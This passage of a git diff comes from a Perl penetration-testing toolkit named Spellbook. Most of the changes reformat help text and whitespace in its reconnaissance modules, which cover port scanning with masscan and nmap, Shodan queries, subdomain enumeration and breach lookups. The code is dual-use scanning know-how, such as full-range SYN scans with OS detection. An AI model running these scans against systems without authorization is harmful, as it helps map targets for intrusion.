Spellbook::Core::UserAgent -> new(); my $response = $userAgent -> get($target); - if ($response -> code() != 500) { + if ($response -> code() != 500) { push @result, $target; } @@ -29,14 +29,11 @@ package Spellbook::Recon::HTTP_Probe { } if ($help) { - return<<"EOT"; - -Recon::HTTP_Probe -===================== --h, --help See this menu --t, --target Define a target to make a HTTP request probe\n\n"; - -EOT + return " + \rRecon::HTTP_Probe + \r===================== + \r-h, --help See this menu + \r-t, --target Define a target to make a HTTP request probe\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/HaveBeenPwned.pm b/lib/Spellbook/Recon/HaveBeenPwned.pm index 1621406..b2c5adf 100644 --- a/lib/Spellbook/Recon/HaveBeenPwned.pm +++ b/lib/Spellbook/Recon/HaveBeenPwned.pm @@ -6,7 +6,7 @@ package Spellbook::Recon::HaveBeenPwned { use Spellbook::Core::Credentials; # THIS IS A DRAFT MODULE - + sub new { my ($self, $parameters) = @_; my ($help, $target); @@ -33,14 +33,11 @@ package Spellbook::Recon::HaveBeenPwned { } if ($help) { - return<<"EOT"; - -Recon::HaveBeenPwned -==================== --h, --help See this menu --e, --target Define an e-mail address as a target\n\n"; - -EOT + return " + \rRecon::HaveBeenPwned + \r==================== + \r-h, --help See this menu + \r-e, --target Define an e-mail address as a target\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Host_Resolv.pm b/lib/Spellbook/Recon/Host_Resolv.pm index 8de4dde..7a79ac0 100644 --- a/lib/Spellbook/Recon/Host_Resolv.pm +++ b/lib/Spellbook/Recon/Host_Resolv.pm @@ -23,18 +23,15 @@ package Spellbook::Recon::Host_Resolv { if ($search) { return $target; - } + } } - + if ($help) { - return<<"EOT"; - -Recon::Host_Resolv -===================== --h, --help See this menu --t, --target Set a domain to get the IP\n\n"; - -EOT + return " + \rRecon::Host_Resolv + \r===================== + \r-h, --help See this menu + \r-t, --target Set a domain to get the IP\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Internal_DNS.pm b/lib/Spellbook/Recon/Internal_DNS.pm index 79a3622..9dabb96 100644 --- a/lib/Spellbook/Recon/Internal_DNS.pm +++ b/lib/Spellbook/Recon/Internal_DNS.pm @@ -26,14 +26,11 @@ package Spellbook::Recon::Internal_DNS { } if ($help) { - return<<"EOT"; - -Recon::Internal_DNS -===================== --h, --help See this menu --t, --target Set a domain to get the IP\n\n"; - -EOT + return " + \rRecon::Internal_DNS + \r===================== + \r-h, --help See this menu + \r-t, --target Set a domain to get the IP\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Masscan.pm b/lib/Spellbook/Recon/Masscan.pm index d460388..205742c 100644 --- a/lib/Spellbook/Recon/Masscan.pm +++ b/lib/Spellbook/Recon/Masscan.pm @@ -5,11 +5,11 @@ package Spellbook::Recon::Masscan { use List::MoreUtils qw(uniq); use Spellbook::Recon::Get_IP; use Spellbook::Helper::CDN_Checker; - + sub new { my ($self, $parameters) = @_; my ($help, @target, @ports, @result, $skip_cdn); - + my @arguments = qw(--banners); Getopt::Long::GetOptionsFromArray ( @@ -19,7 +19,7 @@ package Spellbook::Recon::Masscan { "p|port=s" => \@ports, "a|arguments" => \@arguments, "skip-cdn" => \$skip_cdn - ); + ); if (@target) { if (!@ports) { @ports = "1-65535"; } @@ -28,7 +28,7 @@ package Spellbook::Recon::Masscan { my $CDN_Checker = Spellbook::Helper::CDN_Checker -> new (["--target" => $target[0]]); if ($CDN_Checker) { - return 0; + return 0; } } @@ -45,26 +45,23 @@ package Spellbook::Recon::Masscan { if ($scan) { my $result = $masscan -> scan_results(); - foreach my $value (@{$result -> {"scan_results"}}) { + foreach my $value (@{$result -> {"scan_results"}}) { push @result, $target[0] . ":" . $value -> {"ports"} -> [0] -> {"port"}; } - + return uniq @result; } - } + } if ($help) { - return<<"EOT"; - -Recon::Masscan -===================== --h, --help See this menu --t, --target Set an Domain/IP to make a port scanning using masscan --p, --ports Define ports to scan --a, --arguments Parameters to masscanner ---skip-cdn Skip the CDN check\n\n"; - -EOT + return " + \rRecon::Masscan + \r===================== + \r-h, --help See this menu + \r-t, --target Set an Domain/IP to make a port scanning using masscan + \r-p, --ports Define ports to scan + \r-a, --arguments Parameters to masscanner + \r--skip-cdn Skip the CDN check\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Nmap_Scanner.pm b/lib/Spellbook/Recon/Nmap_Scanner.pm index 15278ad..23ea636 100644 --- a/lib/Spellbook/Recon/Nmap_Scanner.pm +++ b/lib/Spellbook/Recon/Nmap_Scanner.pm @@ -2,28 +2,28 @@ package Spellbook::Recon::Nmap_Scanner { use strict; use warnings; use Nmap::Scanner; # https://metacpan.org/pod/Nmap::Scanner - + sub scan_started { my $self = shift; my $host = shift; - + my $hostname = $host -> hostname(); my $addresses = join(',', map {$_ -> addr()} $host -> addresses()); my $status = $host -> status(); - + print "$hostname ($addresses) is $status\n"; return 0; } - + sub port_found { my $self = shift; my $host = shift; my $port = shift; - + my $name = $host->hostname(); my $addresses = join(',', map {$_ -> addr()} $host -> addresses()); - + print "On host $name ($addresses), found ", $port->state()," port ", join('/', $port -> protocol(), $port -> portid()), "\n"; @@ -48,23 +48,20 @@ package Spellbook::Recon::Nmap_Scanner { $scanner -> register_scan_started_event(\&scan_started); $scanner -> register_port_found_event(\&port_found); $scanner -> scan("-sS -p 1-1024 -O $target"); - + my $results = $scanner -> scan(); # print Dumper($results); return @result; - } + } if ($help) { - return<<"EOT"; - -Recon::Nmap_Scanner -===================== --h, --help See this menu --t, --target Set an IP to run the scanner\n\n"; - -EOT + return " + \rRecon::Nmap_Scanner + \r===================== + \r-h, --help See this menu + \r-t, --target Set an IP to run the scanner\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Query_Shodan.pm b/lib/Spellbook/Recon/Query_Shodan.pm index 0b109b0..b4453c2 100644 --- a/lib/Spellbook/Recon/Query_Shodan.pm +++ b/lib/Spellbook/Recon/Query_Shodan.pm @@ -24,7 +24,7 @@ package Spellbook::Recon::Query_Shodan { if ($httpCode == 200) { my $content = decode_json($request -> content()); - + foreach my $data (@{$content -> {"matches"}}) { my $hostname = $data -> {"ip_str"}; my $port = $data -> {"port"}; @@ -37,14 +37,11 @@ package Spellbook::Recon::Query_Shodan { } if ($help) { - return<<"EOT"; - -Recon::Shodan -===================== --h, --help See this menu --t, --query Define a query\n\n"; - -EOT + return " + \rRecon::Shodan + \r===================== + \r-h, --help See this menu + \r-t, --query Define a query\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Shodan_Enumeration.pm b/lib/Spellbook/Recon/Shodan_Enumeration.pm index bd02dae..d8edb03 100644 --- a/lib/Spellbook/Recon/Shodan_Enumeration.pm +++ b/lib/Spellbook/Recon/Shodan_Enumeration.pm @@ -21,7 +21,7 @@ package Spellbook::Recon::Shodan_Enumeration { if ($target =~ /^http(s)?:\/\//x) { $target =~ s/^http(s)?:\/\///x; } - + my $validate = is_domain($target); if ($validate) { @@ -61,14 +61,11 @@ package Spellbook::Recon::Shodan_Enumeration { } if ($help) { - return<<"EOT"; - -Recon::Shodan_Enum -===================== --h, --help See this menu --t, --target Set an IP to see infos on shodan API\n\n"; - -EOT + return " + \rRecon::Shodan_Enum + \r===================== + \r-h, --help See this menu + \r-t, --target Set an IP to see infos on shodan API\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Subdomain_Enumeration.pm b/lib/Spellbook/Recon/Subdomain_Enumeration.pm index 2bcd126..1d06c66 100644 --- a/lib/Spellbook/Recon/Subdomain_Enumeration.pm +++ b/lib/Spellbook/Recon/Subdomain_Enumeration.pm @@ -5,7 +5,7 @@ package Spellbook::Recon::Subdomain_Enumeration { use List::MoreUtils qw(uniq); use Spellbook::Core::UserAgent; use Spellbook::Core::Credentials; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -50,17 +50,14 @@ package Spellbook::Recon::Subdomain_Enumeration { } return uniq @result; - } + } if ($help) { - return<<"EOT"; - -Recon::Subdomain_Enumeration -===================== --h, --help See this menu --t, --target Find subdomains from a target using SecurityTrails\n\n"; - -EOT + return " + \rRecon::Subdomain_Enumeration + \r===================== + \r-h, --help See this menu + \r-t, --target Find subdomains from a target using SecurityTrails\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Technologies.pm b/lib/Spellbook/Recon/Technologies.pm index 1f411df..0801727 100644 --- a/lib/Spellbook/Recon/Technologies.pm +++ b/lib/Spellbook/Recon/Technologies.pm @@ -16,7 +16,7 @@ package Spellbook::Recon::Technologies { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -36,14 +36,11 @@ package Spellbook::Recon::Technologies { } if ($help) { - return<<"EOT"; - -Recon::Detect_Tech -===================== --t, --target Define the target --h, --help See this menu\n\n"; - -EOT + return " + \rRecon::Detect_Tech + \r===================== + \r-t, --target Define the target + \r-h, --help See this menu\n\n"; } return 1; diff --git a/lib/Spellbook/Recon/WayBackUrls.pm b/lib/Spellbook/Recon/WayBackUrls.pm index d78d397..ffce702 100644 --- a/lib/Spellbook/Recon/WayBackUrls.pm +++ b/lib/Spellbook/Recon/WayBackUrls.pm @@ -3,7 +3,7 @@ package Spellbook::Recon::WayBackUrls { use warnings; use JSON; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -14,11 +14,11 @@ package Spellbook::Recon::WayBackUrls { "t|target=s" => \$target ); - if ($target) { + if ($target) { my $endpoint = "http://web.archive.org/cdx/search/cdx?url=$target/*&output=json&collapse=urlkey"; my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get($endpoint); - + if (($request -> code() == 200) && ($request -> content ne "[]")) { my $content = decode_json($request -> content); @@ -33,14 +33,11 @@ package Spellbook::Recon::WayBackUrls { } if ($help) { - return<<"EOT"; - -Recon::WaybackUrls -===================== --h, --help See this menu --t, --target Set an website to see paths from WayBackMachine\n"; - -EOT + return " + \rRecon::WaybackUrls + \r===================== + \r-h, --help See this menu + \r-t, --target Set an website to see paths from WayBackMachine\n"; } return 0; diff --git a/spellbook.pl b/spellbook.pl index b1792da..fcef7a0 100755 --- a/spellbook.pl +++ b/spellbook.pl @@ -11,7 +11,7 @@ sub main { my ($search, $module, @result); - + Getopt::Long::GetOptions ( "s|search=s" => \$search, "m|module=s" => \$module @@ -25,8 +25,6 @@ sub main { } return Spellbook::Core::Helper -> new() unless $search || $module; - - return 0; } main(); \ No newline at end of file